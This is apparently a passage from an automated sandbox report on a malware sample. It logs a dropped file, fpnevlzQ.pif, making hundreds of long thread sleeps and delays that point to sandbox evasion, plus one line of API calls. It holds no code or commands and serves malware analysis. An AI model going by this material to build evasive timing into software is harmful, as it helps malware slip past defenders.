Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592378s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592253s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -592127s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591815s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591628s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591503s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591378s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591253s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591128s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3116	Thread sleep time: -591003s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598465s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598232s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -598116s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597950s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597591s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597455s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597338s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597192s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -597067s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -596494s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -596335s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -596127s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -595952s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -595308s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594830s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594565s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594380s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594255s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594130s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -594005s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593767s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593630s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593505s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593380s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593255s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593130s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -593005s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592755s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592630s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592505s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592380s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592240s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -592093s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591934s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591817s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591692s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591568s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591443s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591318s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591193s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 3924	Thread sleep time: -591068s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep count: 36 > 30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6532	Thread sleep count: 2085 > 30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6532	Thread sleep count: 7770 > 30
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599765s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599437s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599328s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599218s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599109s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -599000s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598890s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598780s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598672s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598562s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598453s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598343s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598234s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598125s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -598015s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597905s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597796s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597687s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597578s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597468s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597359s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597249s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597140s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -597031s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596922s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596812s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596703s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596593s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596484s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596375s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596265s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596156s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -596047s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595937s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595828s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595718s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595609s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595500s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595390s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595281s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595172s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -595062s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -594951s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -594843s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -594734s >= -30000s
Source: C:\Users\Public\Libraries\fpnevlzQ.pif TID: 6552	Thread sleep time: -594625s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe

Code function: 0_2_028A534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_028A534C

Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598111	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597499	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597388	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597270	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597153	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596943	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596820	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596706	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596586	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596403	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596247	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596087	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595400	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595069	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594549	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594409	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594158	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593877	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593753	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593128	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592878	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592753	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592127	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591815	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591628	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591503	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591378	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591253	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591128	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591003	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598465	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598232	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598116	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597950	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597455	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597338	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597067	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596494	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596335	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 596127	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 595308	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594830	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594565	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594255	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594130	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 594005	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593880	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593767	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593630	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593505	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593255	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593130	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 593005	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592880	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592755	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592630	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592505	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592380	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592240	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 592093	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591934	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591817	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591692	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591568	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591443	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591318	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591193	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 591068	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599437
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599328
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599218
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599109
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 599000
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598890
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598672
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598562
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598453
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598343
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 598015
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Thread delayed: delay time: 597905
